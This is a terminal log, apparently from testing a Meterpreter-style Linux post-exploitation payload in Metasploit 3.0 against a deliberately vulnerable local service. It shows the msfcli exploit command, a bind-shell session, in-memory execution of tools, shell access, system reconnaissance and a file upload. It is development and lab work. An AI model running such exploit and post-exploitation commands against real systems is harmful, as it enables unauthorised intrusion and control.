compaq@soleil:/opt/contrib/sam/meterpretux/framework-3.0$ netstat -atp | grep 4545
(Tous les processus ne peuvent être identifiés, les infos sur les processus
non possédés ne seront pas affichées, vous devez être root pour les voir toutes.)
tcp        0      0 *:4545        *:*        LISTEN     4961/exploitme-posi
compaq@soleil:/opt/contrib/sam/meterpretux/framework-3.0$ ./msfcli exploit/test/aggressive PAYLOAD=linux/x86/meterpretux/meterpretux_bind_tcp RHOST=localhost RPORT=4545 E
[*] Started bind handler
[*] Sending 345 byte payload...
[*] Sending stage (5502 bytes)
[*] Meterpretux session 1 opened (127.0.0.1:2044 -> 127.0.0.1:4444)
meterpretux > help

Core Commands
=============

    Command     Description
    -------     -----------
    ?           Help menu
    cmd         Execute a shell cmd
    download    Download a file
    exec        Execute binary
    exit        Terminate the meterpretux session
    help        Help menu
    jmp         Execute mmaped binary
    ls          List mmaped binaries
    quit        Terminate the meterpretux session
    rm          Delete mmaped binary
    set         Set env vars
    shell       Get a shell
    upload      Upload a file

meterpretux > exec test.so -r
[-] file test.so doesn't exist
meterpretux > set
BINPATH ->
meterpretux > set BINPATH /opt/contrib/sam/meterpretux/binaries
meterpretux > set
BINPATH -> /opt/contrib/sam/meterpretux/binaries
meterpretux > exec test.so -r
trunk  todo  tags  framework-3.0.tgz  framework-3.0  exploitme-posix.c  exploitme-posix  branches  binaries
meterpretux > exec test.so -alp
test.so is already mmaped !
meterpretux > ls

Binary                                        Len       Mmap Addr     Jump Addr
======================================================================================
test.so                                       8192      0xb7f5d000    0xb7f5d500

meterpretux > jmp test.so -alp
total 5524
drwxr-xr-x  8 compaq compaq    4096 Aug 17 12:44 ./
drwxr-xr-x 15 compaq compaq    4096 Aug 16 13:42 ../
drwxr-xr-x  6 compaq compaq    4096 Aug  3 13:58 .svn/
drwxr-xr-x  2 compaq compaq    4096 Aug 17 11:42 binaries/
drwxr-xr-x  3 compaq compaq    4096 Jul 30 14:24 branches/
-rwxr-xr-x  1 compaq compaq    8705 Jul 19 11:31 exploitme-posix
-rw-r--r--  1 compaq compaq    1384 Jul 19 11:31 exploitme-posix.c
drwxr-xr-x 11 compaq compaq    4096 Aug 14 13:34 framework-3.0/
-rw-r--r--  1 compaq compaq 5589977 Aug 17 11:22 framework-3.0.tgz
drwxr-xr-x  3 compaq compaq    4096 Jul 30 14:24 tags/
-rw-r--r--  1 compaq compaq    3472 Aug 17 12:44 todo
drwxr-xr-x  5 compaq compaq    4096 Aug 17 11:49 trunk/
meterpretux > rm test.so
[#] unmaping test.so
[#] unmaped test.so
meterpretux > ls

Binary                                        Len       Mmap Addr     Jump Addr
======================================================================================

meterpretux > help

Core Commands
=============

    Command     Description
    -------     -----------
    ?           Help menu
    cmd         Execute a shell cmd
    download    Download a file
    exec        Execute binary
    exit        Terminate the meterpretux session
    help        Help menu
    jmp         Execute mmaped binary
    ls          List mmaped binaries
    quit        Terminate the meterpretux session
    rm          Delete mmaped binary
    set         Set env vars
    shell       Get a shell
    upload      Upload a file

meterpretux > shell
[#] Type 'exit' to quit this shell..
cat /etc/debian_version
4.0
pwd
/opt/contrib/sam/meterpretux
exit
meterpretux > cmd ls -alp
total 5524
drwxr-xr-x  8 compaq compaq    4096 Aug 17 12:44 ./
drwxr-xr-x 15 compaq compaq    4096 Aug 16 13:42 ../
drwxr-xr-x  6 compaq compaq    4096 Aug  3 13:58 .svn/
drwxr-xr-x  2 compaq compaq    4096 Aug 17 11:42 binaries/
drwxr-xr-x  3 compaq compaq    4096 Jul 30 14:24 branches/
-rwxr-xr-x  1 compaq compaq    8705 Jul 19 11:31 exploitme-posix
-rw-r--r--  1 compaq compaq    1384 Jul 19 11:31 exploitme-posix.c
drwxr-xr-x 11 compaq compaq    4096 Aug 14 13:34 framework-3.0/
-rw-r--r--  1 compaq compaq 5589977 Aug 17 11:22 framework-3.0.tgz
drwxr-xr-x  3 compaq compaq    4096 Jul 30 14:24 tags/
-rw-r--r--  1 compaq compaq    3472 Aug 17 12:44 todo
drwxr-xr-x  5 compaq compaq    4096 Aug 17 11:49 trunk/
meterpretux > ls

Binary                                        Len       Mmap Addr     Jump Addr
======================================================================================
lib/rex/post/meterpretux/extensions/cmd.so    8192      0xb7f5d000    0xb7f5d680

meterpretux > cmd cat /etc/debian_version
4.0
meterpretux > exec ike-scan
ERROR: Could not bind network socket to local port 500
You need to be root, or ike-scan must be suid root to bind to ports below 1024.
ERROR: bind: Permission denied
meterpretux > cmd id
uid=1000(compaq) gid=1000(compaq) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(compaq)
meterpretux > exec amapcrap
amapcrap v5.2 (c) 2005 by van Hauser/THC

Syntax: amapcrap [-S] [-u] [-m 0ab] [-M min,max] [-n connects] [-N delay] [-w delay] [-e] [-v] TARGET PORT

Options:
    -S           use SSL after TCP connect (not usuable with -u)
    -u           use UDP protocol (default: TCP) (not usable with -c)
    -n connects  maximum number of connects (default: unlimited)
    -N delay     delay between connects in ms (default: 0)
    -w delay     delay before closing the port (default: 250)
    -e           do NOT stop when a response was made by the server
    -v           verbose mode
    -m 0ab       send as random crap:0-nullbytes, a-letters+spaces, b-binary
    -M min,max   minimum and maximum length of random crap
    TARGET PORT  target (ip or dns) and port to send random crap

This tool sends random data to a silent port to illicit a response, which can
then be used within amap for future detection. It outputs proper amap
appdefs definitions. Note: by default all modes are activated (0:10%, a:40%, b:50%) .
Mode 'a' always sends one line with letters and spaces which end with \r\n.
Visit our homepage at http://www.thc.org
meterpretux > ls

Binary                                        Len       Mmap Addr     Jump Addr
======================================================================================
amapcrap                                      16384     0xb7f59000    0xb7f59cc0
ike-scan                                      102400    0xb7e0d000    0xb7e0ebf0
lib/rex/post/meterpretux/extensions/cmd.so    8192      0xb7f5d000    0xb7f5d680

meterpretux > cmd mount
/dev/hda2 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/hda3 on /home type ext3 (rw)
/dev/mapper/opt on /opt type ext3 (rw)
meterpretux > upload /etc/debian_version /dev/shm/foobar
[#] uploading from /etc/debian_version to /dev/shm/foobar
[#] uploaded from /etc/debian_version to /dev/shm/foobar
meterpretux > cmd ls -alp /dev/shm/foobar
-rwx------ 1 compaq compaq 4 Aug 17 12:47 /dev/shm/foobar
meterpretux > cmd cat /dev/shm/foobar
4.0
meterpretux > cmd rm /dev/shm/foobar
meterpretux > cmd ls -alp /dev/shm/foobar
/bin/ls: /dev/shm/foobar: No such file or directory
meterpretux > ls

Binary                                        Len       Mmap Addr     Jump Addr
======================================================================================
amapcrap                                      16384     0xb7f59000    0xb7f59cc0
ike-scan                                      102400    0xb7e0d000    0xb7e0ebf0
lib/rex/post/meterpretux/extensions/cmd.so    8192      0xb7f5d000    0xb7f5d680

meterpretux > quit
[!] unmaping all binaries ..
amapcrap
ike-scan
lib/rex/post/meterpretux/extensions/cmd.so
compaq@soleil:/opt/contrib/sam/meterpretux/framework-3.0$